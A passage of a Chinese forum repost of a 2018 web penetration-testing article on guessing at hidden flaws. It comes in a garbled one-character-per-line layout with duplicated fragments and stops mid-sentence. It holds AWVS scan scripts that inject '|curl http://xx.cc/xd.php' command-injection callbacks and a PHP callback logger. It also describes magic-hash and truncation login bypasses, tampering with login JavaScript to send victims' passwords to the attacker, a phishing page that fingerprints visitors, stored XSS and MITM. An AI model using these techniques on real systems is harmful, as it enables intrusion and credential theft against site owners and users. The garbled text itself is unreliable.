论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
渗透测试
[12341] 2018-02-09_Web黑盒渗透思路之猜想
文档创建者:
s7ckTeam
浏览次数:
2
最后更新:
2025-01-18
渗透测试
2 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2018-02-09_Web黑盒渗透思路之猜想
W
e
b
黑
盒
渗
透
思
路
之
猜
想
心
东
F
r
e
e
B
u
f
2
0
1
8
-
0
2
-
0
9
*
本
文
原
创
作
者
:
心
东
,
本
文
属
本
文
原
创
作
者
:
心
东
,
本
文
属
F
r
e
e
B
u
f
原
创
奖
励
计
划
,
未
经
许
可
禁
止
转
载
原
创
奖
励
计
划
,
未
经
许
可
禁
止
转
载
场
景
:
场
景
:
W
E
B
后
台
爆
破
后
台
爆
破
后
台
爆
破
很
多
人
都
会
选
择
最
经
典
的
模
式
,
如
字
典
爆
破
,
挖
掘
未
授
权
访
问
漏
洞
,
挖
掘
验
证
码
漏
洞
(
未
刷
新
,
验
证
后
台
爆
破
很
多
人
都
会
选
择
最
经
典
的
模
式
,
如
字
典
爆
破
,
挖
掘
未
授
权
访
问
漏
洞
,
挖
掘
验
证
码
漏
洞
(
未
刷
新
,
验
证
码
识
别
)
等
方
法
。
码
识
别
)
等
方
法
。
猜
想
:
猜
想
:
1
、
后
台
程
序
是
采
用
M
D
5
加
密
的
方
式
,
并
且
验
证
密
码
跟
被
验
证
密
码
都
是
从
P
H
P
的
M
D
5
加
密
处
理
的
(
P
H
P
5
~
7
存
在
此
B
U
G
)
,
例
如
:
原
理
:
原
理
:
程
序
在
处
理
哈
希
字
符
串
时
,
会
利
用
”
不
等
于
或
等
于
来
对
哈
希
值
进
行
比
较
,
它
把
每
一
个
以
0
E
开
头
的
哈
希
值
都
解
释
为
0
,
所
以
如
果
两
个
不
同
的
密
码
经
过
哈
希
以
后
,
其
哈
希
值
都
是
以
0
E
开
头
的
,
那
么
P
H
P
就
会
认
为
他
们
相
等
。
那
么
在
爆
破
的
时
候
字
典
加
入
一
个
M
D
5
加
密
之
后
以
0
e
开
头
的
明
文
密
码
即
可
。
2
、
前
台
有
注
册
,
是
否
跟
后
台
用
的
是
同
一
个
S
E
S
S
I
O
N
文
件
,
例
如
:
这
个
S
E
S
S
I
O
N
我
们
可
以
假
设
。
程
序
员
在
开
发
中
注
册
一
个
会
员
那
么
就
会
添
加
一
条
数
据
到
数
据
库
里
。
登
录
验
证
成
功
后
会
写
入
一
个
s
e
s
s
i
o
n
,
那
么
后
台
验
证
中
判
断
s
e
s
s
i
o
n
他
可
能
是
这
样
写
的
。
这
个
设
计
缺
陷
可
以
假
设
他
的
s
e
s
s
i
o
n
跟
前
台
用
户
的
s
e
s
s
i
o
n
用
的
是
同
一
个
。
从
而
导
致
一
个
未
授
权
访
问
。
(
前
台
登
录
之
后
访
问
后
台
)
当
然
也
可
以
说
成
是
越
权
。
因
为
我
们
从
一
个
注
册
会
员
登
录
写
入
了
s
e
s
s
i
o
n
从
而
导
致
有
访
问
后
台
的
权
限
P
S
:
具
体
情
况
得
看
代
码
怎
么
写
。
以
上
方
法
我
们
可
以
幻
想
很
多
很
多
种
漏
洞
。
列
如
这
个
我
们
又
可
以
这
样
猜
想
:
s
y
s
t
e
m
的
键
名
是
用
来
判
断
权
限
。
1
则
为
管
理
员
0
则
为
普
通
用
户
在
前
台
有
个
注
册
功
能
,
那
么
我
们
又
联
想
到
了
一
个
M
Y
S
Q
L
的
一
个
溢
出
漏
洞
m
y
.
i
n
i
。
比
如
一
个
表
的
结
构
是
这
样
的
:
可
以
看
到
u
s
e
r
n
a
m
e
跟
p
a
s
s
w
d
的
字
节
为
1
0
,
但
是
m
y
.
i
n
i
设
置
成
的
话
,
就
算
超
出
也
会
添
加
成
功
,
比
如
:
他
不
会
插
入
“
1
2
3
4
5
6
7
8
9
1
2
”
而
是
插
”
1
2
3
4
5
6
7
8
9
1
“
因
为
指
针
到
1
的
时
候
字
节
就
等
于
1
0
了
。
因
此
我
们
注
册
会
员
的
时
候
,
a
d
m
i
n
、
空
格
、
空
格
、
空
格
、
空
格
、
空
格
、
X
X
,
然
后
这
样
就
会
注
册
到
了
a
d
m
i
n
。
切
回
话
题
,
我
们
又
可
以
很
离
谱
的
这
样
猜
想
。
前
台
注
册
用
户
用
的
数
据
库
跟
后
台
是
同
一
个
数
据
表
字
段
。
那
么
我
们
可
以
从
前
台
注
册
然
后
登
录
后
台
。
(
这
种
我
还
是
碰
到
过
的
)
当
然
思
路
还
是
有
很
多
很
多
的
,
得
看
你
去
怎
么
去
猜
想
他
的
代
码
了
场
景
:
场
景
:
W
E
B
扫
描
器
忽
略
的
功
能
扫
描
器
忽
略
的
功
能
i
f
(
$
_
S
E
S
S
I
O
N
[
'
u
s
e
r
'
]
)
{
r
e
t
u
r
n
T
r
u
e
;
}
s
q
l
-
m
o
d
e
=
”
N
O
_
A
U
T
O
_
C
R
E
A
T
E
_
U
S
E
R
,
N
O
_
E
N
G
I
N
E
_
S
U
B
S
T
I
T
U
T
I
O
N
”
c
r
e
a
t
e
t
a
b
l
e
a
d
m
i
n
(
u
s
e
r
n
a
m
e
v
a
r
c
h
a
r
(
1
0
)
n
o
t
n
u
l
l
,
p
a
s
s
w
d
v
a
r
c
h
a
r
(
1
0
)
n
o
t
n
u
l
l
)
;
s
q
l
-
m
o
d
e
=
”
N
O
_
A
U
T
O
_
C
R
E
A
T
E
_
U
S
E
R
,
N
O
_
E
N
G
I
N
E
_
S
U
B
S
T
I
T
U
T
I
O
N
”
i
n
s
e
r
t
i
n
t
o
a
d
m
i
n
v
a
l
u
e
s
(
‘
1
2
3
4
5
6
7
8
9
1
2
’
,
'
1
2
3
4
5
6
'
)
;
扫
描
器
相
信
大
家
都
是
用
过
的
,
比
如
一
些
知
名
的
扫
描
器
:
B
U
R
P
、
A
p
p
S
c
a
n
等
,
但
是
扫
描
器
也
有
不
够
人
性
化
的
时
候
,
例
如
爬
虫
扫
描
。
这
样
我
们
就
以
扫
描
为
主
题
:
1
、
表
单
破
解
,
有
验
证
码
2
、
扫
描
v
a
l
u
e
s
型
S
Q
L
注
入
3
、
存
储
X
S
S
误
报
多
4
、
被
隐
藏
的
某
种
存
在
高
危
漏
洞
的
功
能
(
列
如
存
在
命
令
执
行
没
有
任
何
响
应
的
情
况
下
扫
描
器
判
断
不
出
来
)
在
这
里
公
布
一
个
自
写
A
W
V
S
的
扫
描
规
则
库
(
扫
描
命
令
执
行
无
响
应
)
:
规
则
库
目
录
说
明
:
(
放
到
规
定
目
录
即
可
)
文
件
名
:
c
m
d
.
s
c
r
i
p
t
解
释
:
扫
描
过
程
中
每
个
参
数
都
会
添
加
例
如
:
|
c
u
r
l
h
t
t
p
:
/
/
x
x
.
c
c
/
然
后
发
送
请
求
i
_
u
r
l
变
量
是
当
前
扫
描
的
Y
R
L
回
归
话
题
,
我
们
猜
想
到
许
许
多
多
扫
描
器
忽
视
的
功
能
例
如
:
爬
虫
爬
不
到
的
地
方
,
v
a
l
u
e
s
型
S
Q
L
注
入
,
存
在
X
S
S
,
当
然
不
是
高
危
漏
洞
我
们
就
不
必
挖
掘
,
因
为
我
们
目
的
是
以
入
侵
为
主
,
像
某
些
逻
辑
漏
洞
我
们
可
以
无
视
。
场
景
:
拿
到
场
景
:
拿
到
w
e
b
s
h
e
l
l
数
据
密
码
加
密
的
情
况
下
获
得
明
文
密
码
数
据
密
码
加
密
的
情
况
下
获
得
明
文
密
码
v
a
r
t
a
r
g
e
t
U
r
l
=
n
e
w
T
U
R
L
(
s
c
a
n
U
R
L
.
u
r
l
)
;
/
/
获
取
当
前
的
方
案
也
就
是
获
取
爬
虫
到
的
当
前
请
求
v
a
r
s
c
h
e
m
e
=
g
e
t
C
u
r
r
e
n
t
S
c
h
e
m
e
(
)
;
/
/
创
建
一
个
H
T
T
P
的
工
作
(
要
求
)
v
a
r
h
t
t
p
=
n
e
w
T
H
T
T
P
J
o
b
(
)
;
/
/
在
新
创
建
的
作
业
中
填
充
计
划
将
当
前
请
求
添
加
到
H
T
T
P
s
c
h
e
m
e
.
p
o
p
u
l
a
t
e
R
e
q
u
e
s
t
(
h
t
t
p
)
;
h
t
t
p
_
t
o
p
=
h
t
t
p
.
r
e
q
u
e
s
t
;
/
/
获
取
H
T
T
P
请
求
头
/
/
h
t
t
p
_
t
o
p
.
m
s
g
2
获
取
文
件
+
参
数
h
m
s
g
2
=
h
t
t
p
_
t
o
p
.
m
s
g
2
.
r
e
p
l
a
c
e
(
/
&
/
g
,
"
-
"
)
i
_
u
r
l
=
s
c
a
n
U
R
L
.
h
o
s
t
P
o
r
t
+
"
/
"
+
h
m
s
g
2
;
/
/
一
个
方
案
可
以
有
多
个
输
入
f
o
r
(
v
a
r
i
=
0
;
i
<
s
c
h
e
m
e
.
i
n
p
u
t
C
o
u
n
t
;
i
+
+
)
{
/
/
每
个
输
入
可
以
有
多
个
变
化
v
a
r
v
a
r
i
a
t
i
o
n
s
=
s
c
h
e
m
e
.
s
e
l
e
c
t
V
a
r
i
a
t
i
o
n
s
F
o
r
I
n
p
u
t
(
i
)
;
f
o
r
(
v
a
r
j
=
0
;
j
<
v
a
r
i
a
t
i
o
n
s
.
c
o
u
n
t
;
j
+
+
)
{
/
/
负
荷
的
变
化
s
c
h
e
m
e
.
l
o
a
d
V
a
r
i
a
t
i
o
n
(
v
a
r
i
a
t
i
o
n
s
.
i
t
e
m
(
j
)
)
;
/
/
设
置
我
们
的
有
效
载
荷
的
输
入
值
<
X
S
S
>
s
c
h
e
m
e
.
s
e
t
I
n
p
u
t
V
a
l
u
e
(
i
,
u
n
e
s
c
a
p
e
(
'
c
u
r
l
h
t
t
p
:
/
/
x
x
.
c
c
/
x
d
.
p
h
p
?
i
=
'
+
i
_
u
r
l
)
)
;
/
/
创
建
一
个
H
T
T
P
的
工
作
(
要
求
)
v
a
r
j
o
b
=
n
e
w
T
H
T
T
P
J
o
b
(
)
;
/
/
设
置
工
作
t
a
r
g
e
t
u
r
l
U
R
L
j
o
b
.
u
r
l
=
t
a
r
g
e
t
U
r
l
;
/
/
在
新
创
建
的
作
业
中
填
充
计
划
s
c
h
e
m
e
.
p
o
p
u
l
a
t
e
R
e
q
u
e
s
t
(
j
o
b
)
;
/
/
执
行
H
T
T
P
工
作
j
o
b
.
e
x
e
c
u
t
e
(
)
;
}
}
/
/
一
个
方
案
可
以
有
多
个
输
入
f
o
r
(
v
a
r
i
=
0
;
i
<
s
c
h
e
m
e
.
i
n
p
u
t
C
o
u
n
t
;
i
+
+
)
{
/
/
每
个
输
入
可
以
有
多
个
变
化
v
a
r
v
a
r
i
a
t
i
o
n
s
=
s
c
h
e
m
e
.
s
e
l
e
c
t
V
a
r
i
a
t
i
o
n
s
F
o
r
I
n
p
u
t
(
i
)
;
f
o
r
(
v
a
r
j
=
0
;
j
<
v
a
r
i
a
t
i
o
n
s
.
c
o
u
n
t
;
j
+
+
)
{
/
/
负
荷
的
变
化
s
c
h
e
m
e
.
l
o
a
d
V
a
r
i
a
t
i
o
n
(
v
a
r
i
a
t
i
o
n
s
.
i
t
e
m
(
j
)
)
;
/
/
设
置
我
们
的
有
效
载
荷
的
输
入
值
<
X
S
S
>
s
c
h
e
m
e
.
s
e
t
I
n
p
u
t
V
a
l
u
e
(
i
,
u
n
e
s
c
a
p
e
(
'
|
c
u
r
l
h
t
t
p
:
/
/
x
x
.
c
c
/
x
d
.
p
h
p
?
i
=
'
+
i
_
u
r
l
)
)
;
/
/
创
建
一
个
H
T
T
P
的
工
作
(
要
求
)
v
a
r
j
o
b
=
n
e
w
T
H
T
T
P
J
o
b
(
)
;
/
/
设
置
工
作
t
a
r
g
e
t
u
r
l
U
R
L
j
o
b
.
u
r
l
=
t
a
r
g
e
t
U
r
l
;
/
/
在
新
创
建
的
作
业
中
填
充
计
划
s
c
h
e
m
e
.
p
o
p
u
l
a
t
e
R
e
q
u
e
s
t
(
j
o
b
)
;
/
/
执
行
H
T
T
P
工
作
j
o
b
.
e
x
e
c
u
t
e
(
)
;
}
}
/
/
一
个
方
案
可
以
有
多
个
输
入
f
o
r
(
v
a
r
i
=
0
;
i
<
s
c
h
e
m
e
.
i
n
p
u
t
C
o
u
n
t
;
i
+
+
)
{
/
/
每
个
输
入
可
以
有
多
个
变
化
v
a
r
v
a
r
i
a
t
i
o
n
s
=
s
c
h
e
m
e
.
s
e
l
e
c
t
V
a
r
i
a
t
i
o
n
s
F
o
r
I
n
p
u
t
(
i
)
;
f
o
r
(
v
a
r
j
=
0
;
j
<
v
a
r
i
a
t
i
o
n
s
.
c
o
u
n
t
;
j
+
+
)
{
/
/
负
荷
的
变
化
s
c
h
e
m
e
.
l
o
a
d
V
a
r
i
a
t
i
o
n
(
v
a
r
i
a
t
i
o
n
s
.
i
t
e
m
(
j
)
)
;
/
/
设
置
我
们
的
有
效
载
荷
的
输
入
值
<
X
S
S
>
s
c
h
e
m
e
.
s
e
t
I
n
p
u
t
V
a
l
u
e
(
i
,
u
n
e
s
c
a
p
e
(
'
|
c
u
r
l
h
t
t
p
:
/
/
x
x
.
c
c
/
x
d
.
p
h
p
?
i
=
'
+
i
_
u
r
l
+
"
%
2
3
"
)
)
;
/
/
创
建
一
个
H
T
T
P
的
工
作
(
要
求
)
v
a
r
j
o
b
=
n
e
w
T
H
T
T
P
J
o
b
(
)
;
/
/
设
置
工
作
t
a
r
g
e
t
u
r
l
U
R
L
j
o
b
.
u
r
l
=
t
a
r
g
e
t
U
r
l
;
/
/
在
新
创
建
的
作
业
中
填
充
计
划
s
c
h
e
m
e
.
p
o
p
u
l
a
t
e
R
e
q
u
e
s
t
(
j
o
b
)
;
/
/
执
行
H
T
T
P
工
作
j
o
b
.
e
x
e
c
u
t
e
(
)
;
}
}
/
/
一
个
方
案
可
以
有
多
个
输
入
f
o
r
(
v
a
r
i
=
0
;
i
<
s
c
h
e
m
e
.
i
n
p
u
t
C
o
u
n
t
;
i
+
+
)
{
/
/
每
个
输
入
可
以
有
多
个
变
化
v
a
r
v
a
r
i
a
t
i
o
n
s
=
s
c
h
e
m
e
.
s
e
l
e
c
t
V
a
r
i
a
t
i
o
n
s
F
o
r
I
n
p
u
t
(
i
)
;
f
o
r
(
v
a
r
j
=
0
;
j
<
v
a
r
i
a
t
i
o
n
s
.
c
o
u
n
t
;
j
+
+
)
{
/
/
负
荷
的
变
化
s
c
h
e
m
e
.
l
o
a
d
V
a
r
i
a
t
i
o
n
(
v
a
r
i
a
t
i
o
n
s
.
i
t
e
m
(
j
)
)
;
/
/
设
置
我
们
的
有
效
载
荷
的
输
入
值
<
X
S
S
>
s
c
h
e
m
e
.
s
e
t
I
n
p
u
t
V
a
l
u
e
(
i
,
u
n
e
s
c
a
p
e
(
'
|
c
u
r
l
h
t
t
p
:
/
/
x
x
.
c
c
/
x
d
.
p
h
p
?
i
=
'
+
i
_
u
r
l
+
"
)
%
2
3
"
)
)
;
/
/
创
建
一
个
H
T
T
P
的
工
作
(
要
求
)
v
a
r
j
o
b
=
n
e
w
T
H
T
T
P
J
o
b
(
)
;
/
/
设
置
工
作
t
a
r
g
e
t
u
r
l
U
R
L
j
o
b
.
u
r
l
=
t
a
r
g
e
t
U
r
l
;
/
/
在
新
创
建
的
作
业
中
填
充
计
划
s
c
h
e
m
e
.
p
o
p
u
l
a
t
e
R
e
q
u
e
s
t
(
j
o
b
)
;
/
/
执
行
H
T
T
P
工
作
j
o
b
.
e
x
e
c
u
t
e
(
)
;
}
}
/
/
一
个
方
案
可
以
有
多
个
输
入
f
o
r
(
v
a
r
i
=
0
;
i
<
s
c
h
e
m
e
.
i
n
p
u
t
C
o
u
n
t
;
i
+
+
)
{
/
/
每
个
输
入
可
以
有
多
个
变
化
v
a
r
v
a
r
i
a
t
i
o
n
s
=
s
c
h
e
m
e
.
s
e
l
e
c
t
V
a
r
i
a
t
i
o
n
s
F
o
r
I
n
p
u
t
(
i
)
;
f
o
r
(
v
a
r
j
=
0
;
j
<
v
a
r
i
a
t
i
o
n
s
.
c
o
u
n
t
;
j
+
+
)
{
/
/
负
荷
的
变
化
s
c
h
e
m
e
.
l
o
a
d
V
a
r
i
a
t
i
o
n
(
v
a
r
i
a
t
i
o
n
s
.
i
t
e
m
(
j
)
)
;
/
/
设
置
我
们
的
有
效
载
荷
的
输
入
值
<
X
S
S
>
s
c
h
e
m
e
.
s
e
t
I
n
p
u
t
V
a
l
u
e
(
i
,
u
n
e
s
c
a
p
e
(
'
|
c
u
r
l
h
t
t
p
:
/
/
x
x
.
c
c
/
x
d
.
p
h
p
?
i
=
'
+
i
_
u
r
l
+
"
)
)
%
2
3
"
)
)
;
/
/
创
建
一
个
H
T
T
P
的
工
作
(
要
求
)
v
a
r
j
o
b
=
n
e
w
T
H
T
T
P
J
o
b
(
)
;
/
/
设
置
工
作
t
a
r
g
e
t
u
r
l
U
R
L
j
o
b
.
u
r
l
=
t
a
r
g
e
t
U
r
l
;
/
/
在
新
创
建
的
作
业
中
填
充
计
划
s
c
h
e
m
e
.
p
o
p
u
l
a
t
e
R
e
q
u
e
s
t
(
j
o
b
)
;
/
/
执
行
H
T
T
P
工
作
j
o
b
.
e
x
e
c
u
t
e
(
)
;
}
}
接
受
请
求
的
P
H
P
代
码
:
文
件
名
:
x
d
.
p
h
p
<
?
p
h
p
$
i
p
=
$
_
S
E
R
V
E
R
[
"
R
E
M
O
T
E
_
A
D
D
R
"
]
?
$
_
S
E
R
V
E
R
[
"
R
E
M
O
T
E
_
A
D
D
R
"
]
:
"
"
;
i
f
(
$
i
p
)
{
$
i
=
e
m
p
t
y
(
$
_
G
E
T
[
'
i
'
]
)
?
"
"
:
$
_
G
E
T
[
'
i
'
]
;
$
t
x
t
=
h
t
m
l
s
p
e
c
i
a
l
c
h
a
r
s
(
$
i
p
.
"
-
-
-
-
-
"
.
$
i
.
"
r
n
"
)
;
$
n
a
=
f
o
p
e
n
(
"
x
d
.
t
x
t
"
,
"
a
+
"
)
;
$
x
i
e
=
f
w
r
i
t
e
(
$
n
a
,
$
t
x
t
)
;
}
?
>
文
件
名
:
c
m
d
_
i
n
s
p
e
c
t
.
s
c
r
i
p
t
解
释
:
扫
描
器
扫
完
后
发
送
一
个
H
T
T
P
请
求
判
断
是
否
这
个
域
名
是
否
存
在
命
令
执
行
漏
洞
/
/
s
c
a
n
u
r
l
.
u
r
l
返
回
U
R
L
字
符
串
v
a
r
t
a
r
g
e
t
U
r
l
=
n
e
w
T
U
R
L
(
"
h
t
t
p
:
/
/
x
x
.
c
c
/
x
d
.
t
x
t
"
)
;
v
a
r
h
t
t
p
=
n
e
w
T
H
T
T
P
J
o
b
(
)
;
h
t
t
p
.
u
r
l
=
t
a
r
g
e
t
U
r
l
;
h
t
t
p
.
v
e
r
b
=
'
G
E
T
'
;
/
/
执
行
请
求
h
t
t
p
.
e
x
e
c
u
t
e
(
)
;
v
a
r
d
z
R
e
s
=
h
t
t
p
.
r
e
s
p
o
n
s
e
.
b
o
d
y
;
/
/
获
取
H
T
T
P
响
应
内
容
i
f
(
d
z
R
e
s
.
i
n
d
e
x
O
f
(
s
c
a
n
U
R
L
.
h
o
s
t
P
o
r
t
)
!
=
-
1
)
{
l
o
g
I
n
f
o
(
'
m
e
s
s
a
g
e
:
-
-
-
-
>
y
u
a
n
c
h
e
n
g
m
i
n
g
l
i
n
g
z
h
i
x
i
n
g
!
!
'
)
;
/
/
扫
描
日
志
输
出
信
息
v
a
r
r
i
=
n
e
w
T
R
e
p
o
r
t
I
t
e
m
(
)
;
/
/
新
建
报
告
结
果
返
回
扫
描
器
界
面
r
i
.
L
o
a
d
F
r
o
m
F
i
l
e
(
"
c
m
d
.
x
m
l
"
)
;
/
/
载
入
模
板
r
i
.
a
f
f
e
c
t
s
=
"
h
t
t
p
:
/
/
x
x
.
c
c
/
x
d
.
t
x
t
"
;
r
i
.
r
e
q
u
e
s
t
=
h
t
t
p
.
r
e
q
u
e
s
t
.
t
o
S
t
r
i
n
g
(
)
;
/
/
将
H
T
T
P
请
求
头
输
出
到
扫
描
器
r
i
.
r
e
s
p
o
n
s
e
=
h
t
t
p
.
r
e
s
p
o
n
s
e
.
b
o
d
y
;
/
/
将
H
T
T
P
响
应
的
内
容
输
出
到
扫
描
器
r
i
.
f
u
l
l
R
e
s
p
o
n
s
e
=
h
t
t
p
.
r
e
s
p
o
n
s
e
.
b
o
d
y
;
/
/
将
H
T
T
P
响
应
的
内
容
输
出
到
扫
描
器
/
/
添
加
警
报
A
d
d
R
e
p
o
r
t
I
t
e
m
(
r
i
)
;
/
/
确
定
输
出
}
我
们
拿
到
w
e
b
s
h
e
l
l
之
后
想
拿
到
数
据
库
的
明
文
密
码
,
我
们
一
开
始
的
思
维
肯
定
在
想
:
逆
推
,
撞
库
,
还
有
就
是
嗅
探
等
方
法
。
嗅
探
方
法
:
流
量
大
,
易
被
防
火
墙
报
警
。
逆
推
方
法
:
耗
脑
。
撞
库
方
法
:
走
很
多
个
步
骤
。
(
收
集
数
据
)
其
实
我
们
可
以
换
个
角
度
去
想
的
,
居
然
我
们
都
拿
到
w
e
b
s
h
e
l
l
了
,
还
不
如
修
改
W
E
B
程
序
,
例
如
验
证
用
户
密
码
是
否
对
错
,
如
果
登
录
成
功
,
那
么
就
记
录
他
的
。
例
如
这
个
。
那
么
问
题
来
了
,
没
权
限
修
改
怎
么
办
?
你
可
能
会
想
到
提
权
。
。
。
其
实
我
们
把
目
光
指
向
到
H
T
M
L
。
。
。
列
如
我
们
可
以
看
到
有
后
台
登
录
页
面
有
包
含
J
S
的
地
方
,
那
么
我
们
可
以
去
修
改
J
S
,
利
用
a
j
a
x
方
法
来
获
取
h
t
m
l
的
i
n
p
u
t
的
值
来
发
送
到
我
们
服
务
器
上
,
但
是
也
可
以
不
用
a
j
a
x
方
法
。
你
也
可
以
用
这
种
方
法
。
比
如
:
比
如
点
击
提
交
按
钮
被
触
发
后
我
们
可
以
获
取
i
n
p
u
t
的
值
然
后
当
然
如
果
J
S
文
件
还
没
权
限
修
改
的
话
你
可
以
提
权
。
。
又
或
者
你
有
跟
他
同
一
个
局
域
网
的
机
器
,
进
行
中
间
人
劫
持
。
如
果
他
是
H
T
T
P
S
的
话
你
可
以
往
里
面
注
入
个
J
S
。
场
景
:
收
集
信
息
无
从
下
手
场
景
:
收
集
信
息
无
从
下
手
收
集
信
息
我
个
人
觉
得
这
个
要
个
人
的
实
战
经
验
,
以
及
思
考
能
力
。
我
个
人
的
实
战
经
验
虽
不
算
多
,
不
过
在
这
里
我
还
是
说
下
某
些
信
息
被
我
们
忽
视
掉
的
信
息
。
第
一
种
:
列
如
某
站
:
w
w
w
.
a
a
.
c
o
m
(
未
做
C
D
N
)
很
多
人
都
会
走
以
下
流
程
:
收
集
子
域
,
注
册
人
信
息
以
及
注
册
过
的
域
名
关
联
域
名
等
等
。
同
时
也
有
人
忽
视
掉
了
一
点
,
那
就
是
域
名
解
析
历
史
I
P
,
我
们
可
以
这
样
猜
想
域
名
没
换
,
但
是
服
务
器
搬
了
很
多
次
。
当
前
某
域
名
解
析
的
I
P
是
6
9
.
。
那
么
我
们
可
以
大
胆
的
假
设
,
1
0
3
开
头
的
I
P
是
以
前
的
服
务
器
,
域
名
现
在
解
析
换
成
了
6
9
开
头
的
,
但
是
1
0
3
开
头
的
服
务
器
网
站
服
务
还
是
开
的
,
数
据
也
没
清
理
。
。
。
我
们
把
网
站
解
析
到
1
0
3
开
头
的
I
P
,
这
也
是
一
种
收
集
信
息
的
技
巧
。
。
。
第
二
种
:
查
找
跟
目
标
同
一
个
内
网
关
联
的
域
名
,
(
C
段
根
据
网
站
内
容
判
断
是
否
跟
目
标
同
一
个
内
网
,
子
域
,
或
者
有
着
关
联
的
部
门
,
又
或
者
有
着
直
接
关
联
的
,
再
或
者
从
百
科
了
解
信
息
查
找
可
疑
跟
目
标
同
一
个
内
网
的
站
。
。
还
有
很
多
种
方
法
)
场
景
:
渗
透
攻
击
之
钓
鱼
场
景
:
渗
透
攻
击
之
钓
鱼
相
信
鱼
叉
攻
击
法
大
家
都
是
用
过
的
,
如
果
只
是
针
对
一
个
单
用
户
钓
鱼
的
话
我
们
可
以
利
用
某
种
辅
助
功
能
来
收
集
信
息
为
我
们
入
侵
铺
上
更
好
的
环
境
。
比
如
:
一
个
M
V
C
思
想
的
站
中
。
收
集
信
息
(
找
目
标
源
码
什
么
都
没
有
包
括
邮
箱
信
息
)
,
以
及
任
何
任
何
任
何
的
入
侵
方
式
都
无
效
并
且
我
们
感
到
无
能
为
力
的
情
况
下
。
但
是
有
个
提
交
留
言
板
(
毫
无
漏
洞
)
。
我
们
可
以
这
样
想
。
插
入
一
个
U
R
L
,
比
如
:
h
t
t
p
:
/
/
w
w
w
.
a
.
c
o
m
/
1
.
p
h
p
1
、
p
h
p
代
码
如
下
:
2
、
H
T
M
L
是
钓
鱼
内
容
代
码
中
记
录
到
了
浏
览
器
头
,
我
们
从
浏
览
器
头
可
以
判
断
目
标
是
用
了
w
i
n
d
o
w
s
系
统
还
是
l
i
n
u
x
系
统
,
列
如
M
A
C
系
统
我
们
可
以
准
备
M
A
C
木
马
。
。
我
们
又
记
录
到
了
他
的
I
P
。
我
们
又
可
以
去
想
象
记
录
中
的
I
P
是
可
以
代
理
I
P
,
公
网
,
我
们
可
以
从
他
的
代
理
I
P
下
手
,
又
或
者
C
段
进
行
中
间
人
攻
击
。
。
。
场
景
:
找
后
台
(
重
定
向
攻
击
法
)
场
景
:
找
后
台
(
重
定
向
攻
击
法
)
相
信
大
家
都
有
碰
到
过
这
种
情
况
。
找
目
标
管
理
后
台
,
找
邮
件
登
录
的
W
E
B
域
名
等
。
。
。
一
开
始
大
家
的
思
路
都
是
:
扫
描
全
网
。
靠
搜
索
引
擎
等
其
他
非
常
经
典
的
方
法
。
但
是
在
某
种
条
件
下
我
们
可
以
利
用
W
E
B
语
言
或
浏
览
器
脚
本
语
言
进
行
辅
助
型
攻
击
。
比
如
网
站
前
台
有
提
交
信
息
给
后
台
,
我
们
可
以
利
用
存
储
X
S
S
进
行
攻
击
从
而
获
取
到
后
台
地
址
这
也
是
一
种
方
法
。
但
是
问
题
来
了
提
交
了
之
后
后
台
没
有
触
发
到
J
S
怎
么
办
?
<
?
p
h
p
h
e
a
d
e
r
(
"
C
o
n
t
e
n
t
-
t
y
p
e
:
t
e
x
t
/
h
t
m
l
;
c
h
a
r
s
e
t
=
g
b
2
3
1
2
"
)
;
i
n
c
l
u
d
e
'
.
/
1
.
h
t
m
l
'
;
$
h
t
t
p
=
$
_
S
E
R
V
E
R
[
'
H
T
T
P
_
U
S
E
R
_
A
G
E
N
T
'
]
?
$
_
S
E
R
V
E
R
[
'
H
T
T
P
_
U
S
E
R
_
A
G
E
N
T
'
]
:
"
"
;
$
i
p
=
$
_
S
E
R
V
E
R
[
"
R
E
M
O
T
E
_
A
D
D
R
"
]
?
$
_
S
E
R
V
E
R
[
"
R
E
M
O
T
E
_
A
D
D
R
"
]
:
"
"
;
$
t
x
t
=
h
t
m
l
s
p
e
c
i
a
l
c
h
a
r
s
(
$
i
p
.
"
-
-
-
-
-
"
.
$
h
t
t
p
.
"
r
n
"
)
;
$
n
a
=
f
o
p
e
n
(
"
x
d
2
.
t
x
t
"
,
"
a
+
"
)
;
$
x
i
e
=
f
w
r
i
t
e
(
$
n
a
,
$
t
x
t
)
;
?
>
我
们
可
以
把
思
路
放
到
A
标
签
。
A
标
签
就
是
重
点
。
列
如
这
种
我
们
想
查
找
他
的
邮
件
的
登
录
域
名
。
记
录
到
的
H
T
T
P
_
R
E
F
E
R
E
R
写
入
文
件
即
可
。
点
击
之
后
。
此
方
法
也
并
不
是
百
分
百
成
功
,
在
某
种
条
件
下
才
能
利
用
。
第
二
种
方
法
:
我
们
可
以
猜
想
目
标
站
就
只
是
个
负
责
输
出
数
据
给
用
户
看
而
已
,
而
真
真
正
正
的
后
台
是
另
外
一
个
域
名
管
理
目
标
站
,
并
且
需
要
绑
定
H
O
S
T
文
件
才
可
以
。
自
写
小
工
具
:
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
x
i
n
d
o
n
g
z
h
u
a
i
z
h
u
a
i
/
h
o
s
t
_
i
p
/
我
们
的
思
路
可
以
这
样
想
:
扫
全
网
(
不
建
议
)
,
查
找
可
疑
I
P
(
C
段
历
史
I
P
C
段
注
册
过
的
域
名
C
段
等
方
法
)
场
景
:
查
找
真
实
场
景
:
查
找
真
实
I
P
这
个
找
真
实
I
P
似
乎
是
每
个
安
全
工
程
师
都
会
经
历
过
的
事
情
无
非
就
是
扫
文
件
找
历
史
I
P
邮
寄
发
送
D
D
O
S
扫
全
网
。
等
方
法
其
他
方
法
都
还
可
以
但
是
我
个
人
觉
得
扫
全
网
似
乎
就
是
开
着
坦
克
打
飞
机
。
至
于
为
什
么
这
样
说
我
得
解
释
一
下
:
我
们
就
拿
z
m
a
p
来
说
吧
扫
描
速
度
很
好
非
常
强
大
,
但
是
往
往
越
强
大
的
工
具
就
越
有
缺
点
。
原
因
:
z
m
a
p
流
量
识
别
太
简
单
,
他
速
度
快
的
原
因
是
因
为
t
c
p
会
话
要
3
次
握
手
才
能
建
立
,
而
z
m
a
p
直
接
第
一
次
握
手
就
把
请
求
断
掉
了
。
于
是
大
多
数
V
P
S
一
扫
就
封
。
。
。
回
归
话
题
其
实
找
真
实
I
P
不
妨
我
们
试
试
挖
掘
S
S
R
F
X
E
E
这
类
的
漏
洞
文
件
包
含
等
(
只
要
能
控
制
目
标
能
发
